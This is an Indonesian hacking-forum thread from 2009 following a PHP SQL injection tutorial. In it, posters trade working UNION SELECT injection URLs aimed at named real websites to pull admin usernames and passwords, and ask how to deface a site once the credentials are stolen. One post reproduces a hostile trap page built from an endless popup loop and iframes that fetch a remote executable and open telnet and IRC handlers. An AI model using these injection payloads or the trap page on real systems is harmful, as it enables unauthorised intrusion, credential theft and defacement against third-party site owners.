[TUTORIAL] SQL Injection Pada PHP

exops · Post by **exops** » Tue Jun 30, 2009 4:33 pm

sptnya yg ini dah lengkap, tp kok ttp g bs ?
http://www.vnrhcs.org/news_detail.php?i ... TABASE()--

whats wrong ?

justkid · Post by **justkid** » Tue Jun 30, 2009 6:34 pm

Mo tanya ni...

kalo dah dapet user + pass adminnya gimana cara defacenya om??

ni aq da koleksi user+pass adminnya
http://www.jaspal.com/news_detail.php?i ... m+tbuser--

justkid · Post by **justkid** » Tue Jun 30, 2009 6:37 pm

sory rewrite, there is a wrong
this is my colection is true

----------------------------------
http://www.jaspal.com/news_detail.php?i ... m+tbuser--
----------------------------------

uba_bully · Post by **uba_bully** » Fri Jul 24, 2009 1:01 pm

kang .
saya dapet yg versi 4 .
mohon pencerahan nya .

lfay · Post by **lfay** » Fri Jul 24, 2009 9:45 pm

Setelah Q ikuti stepÂ² gua ngedapati gini neh

Code: Select all

MySQL error 1222: The used SELECT statements have a different number of columns

setelah q masukkan

Code: Select all

http://www.examplesaja.com.my/news/news_detail.php?id=-3+union+all+select+1,version(),3,4,5,6,7,8/*

gimana kk'...
mohon bimbingan yak...?

lfay · Post by **lfay** » Fri Jul 24, 2009 11:12 pm

exops wrote:sptnya yg ini dah lengkap, tp kok ttp g bs ?
http://www.vnrhcs.org/news_detail.php?i ... TABASE()--

whats wrong ?

ya jadi contoh tu SqL versi 5 > bro...
kalu versi 4 katanya agak sedikit beda gitu....nebak2 table ato gimana kurang tau gua...

lfay · Post by **lfay** » Sat Jul 25, 2009 12:24 am

dapet juga neh.....

Code: Select all

http://www.signyband.com/news_detail.php?id=-6+union+all+select+1,2,GROUP_CONCAT(username,0x3a,password,0x3a),4,5,6,7,8,9,10+from+mod_tbluser--

tapi sayang nya udah ada yang pernah masuk....

btw, cari login adminnya dimana ya...?

Post by **3xtr3m3b0y** » Mon Jul 27, 2009 7:44 pm

al-carati wrote:
aries deris wrote:
Bi4kKob4r wrote:perhatian aja...
hati2 dalam mencoba

soalnya banyak yang bikin serangan balik

contohnya

harap berdoa sebelum klik
wkwkwkwkwk scriptnya Xshadow
wkwkwkwkwwk
iya tuh isa buat nyerang balik wkwkwkwkwkwkwk
@ Bwt bung x-shadow tolong dishare script bwt nyerang balik gitu
coz ane jg pernah nyoba buka trus mozzila ane jd hang akhirnya ane tekan ctrl+alt+del aja bwt
ngilangin,salut bwt bung x-shadow

Waktu dibuka, pas sdh Loading separuh langsung di STOP, trus View Sourcex...

Code: Select all

<html>
<head>
<script language='javascript'>
function stayHere(){
	alert('fvck y0u');
	while(1<2){
	  window.open("index.php");
	}
}
</script>
</head>
<body onunload="stayHere()">
  
  //Baris ini dicopy sebanyak2x, mulai dari baris di bawah sampai...
  <IFRAME ONLOAD="alert('fvck y0u')" SRC="mailto:[email protected]?subject=jancuk jaran&body=fvck y0u full"></IFRAME>
<iframe id=xx src="http://cc.shu.edu.tw/~download/rar/wrar35b6tc.exe">
<iframe id=xx src="ymsgr:sendim?kena6">
<iframe id=xx src="telnet://192.168.1.100">
<iframe id=fvck src="irc://irc.theoneserv.net:6668">
  <script language='javascript'>
    while(1<2) { 
	  setTimeout(alert('fvck y0u'), 1000);
	  window.open("index.php");
	}
  </script>
 //Sampai baris di atas...

</body>
</html>

Cumi234 · Post by **Cumi234** » Mon Aug 03, 2009 9:55 pm

masalah di hexadecimal_sql

ada yg mau bantu ....?

defacement88 · Post by **defacement88** » Wed Aug 12, 2009 4:51 pm

Cumi234 wrote:masalah di hexadecimal_sql

ada yg mau bantu ....?

maksudnya hexadecimal dari "Cumi234"

nih

0x43756d69323334

*Cyber Security Forum (X-code) - PT. Teknologi Server Indonesia

[TUTORIAL] SQL Injection Pada PHP

Re: [TUTORIAL]SQL Injection Pada PHP

Re: [TUTORIAL]SQL Injection Pada PHP

Re: [TUTORIAL]SQL Injection Pada PHP

Re: [TUTORIAL]SQL Injection Pada PHP

Re: [TUTORIAL]SQL Injection Pada PHP

Re: [TUTORIAL]SQL Injection Pada PHP

Re: [TUTORIAL]SQL Injection Pada PHP

Re: [TUTORIAL]SQL Injection Pada PHP

Re: [TUTORIAL]SQL Injection Pada PHP

Re: [TUTORIAL]SQL Injection Pada PHP